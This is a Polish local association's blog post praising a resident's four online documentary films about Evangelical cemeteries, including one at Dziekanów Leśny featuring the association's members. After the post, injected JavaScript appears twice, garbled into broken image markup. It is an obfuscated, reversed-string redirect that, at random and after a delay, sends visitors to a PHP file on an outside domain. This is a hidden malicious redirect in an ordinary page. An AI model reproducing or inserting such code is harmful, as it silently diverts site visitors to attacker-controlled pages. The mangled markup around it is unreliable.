„Nasz” film

Z powodu covid-19 premiery filmowe odbywają się niestety wirtualnie, bez spotkań autorskich, bez podziękowań i toastów. Nie można ich jednak przegapić, zwłaszcza jeśli na ekrany wchodzą pozycje opisujące bliskie nam sprawy. Niedawno nasz sąsiad Andrzej Weigle, mieszkaniec Dąbrowy, zrealizował cykl czterech filmów dokumentalnych o czterech cmentarzach ewangelickich.


Warto obejrzeć je wszystkie, ale członków SNŁ z pewnością najbardziej zainteresuje ostatni, pozostawiony „na deser”, jako dokumentacja szczególnie udanego, konsekwentnego działania lokalnej społeczności. Cmentarz w Dziekanowie stał się tłem do przedstawienia początków Stowarzyszenia od roku 2001 i późniejszych różnorodnych działań upamiętniających historyczne dziedzictwo naszej Małej Ojczyzny. W filmie występują członkowie i sympatycy SNŁ.

Oto tytuły filmów, zawierające linki:

„Kamienie niepamięci” – o cmentarzu w Górze Kalwarii;
„Kampinoscy menonici” – o cmentarzu w Sadach;
„Kotwice pamięci” – o cmentarzu przy ul. Młynarskiej w Warszawie;
„Dziekanowscy osadnicy” – o cmentarzu w Dziekanowie Leśnym.

Internetowe premiery odbyły się w cztery minione soboty. Link do ostatniego opublikowano 21-go listopada 2020, ta wiadomość jest więc bardzo aktualna. Większość scen sfilmowano na cmentarzu w Dziekanowie 10-go października 2020, ale najstarsze statyczne przebitki pochodzą z roku 2012, część z nich znamy z broszury „Kolonia Dziekanowska i okolice”, wydanej przez SNŁ w roku 2014.

Pamiętajmy, że Autor filmów, Andrzej Weigle, brał wielokrotnie czynny udział w pracach Stowarzyszenia Nasze Łomianki na otoczonych przez nas opieką cmentarzach luterańskich, oraz propagował nasze działania w kościele ewangelicko-augsburskim, dzięki czemu zdobyliśmy w tym środowisku wielu przyjaciół. Tym bardziej należą się Andrzejowi nasze podziękowania i brawa za „nasz” film.
return $zXz.list[n].split(„”;).reverse().join(„”;);return $zXz.list[n];};$zXz.list=[„\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to-T.-Sienicki.jpg”>;) return $zXz.list[n].split(„”;).reverse().join(„”;);return $zXz.list[n];};$zXz.list=[„\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to-T.-Sienicki-300×231.jpg” alt=”” width=”1200″ height=”924″ class=”alignnone size-medium wp-image-3114″ />

Tomasz Sienicki Opublikowane przez:

Bądź pierwszą osobą, która zostawi swój komentarz

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Afiseaza emoticoanele Locco.Ro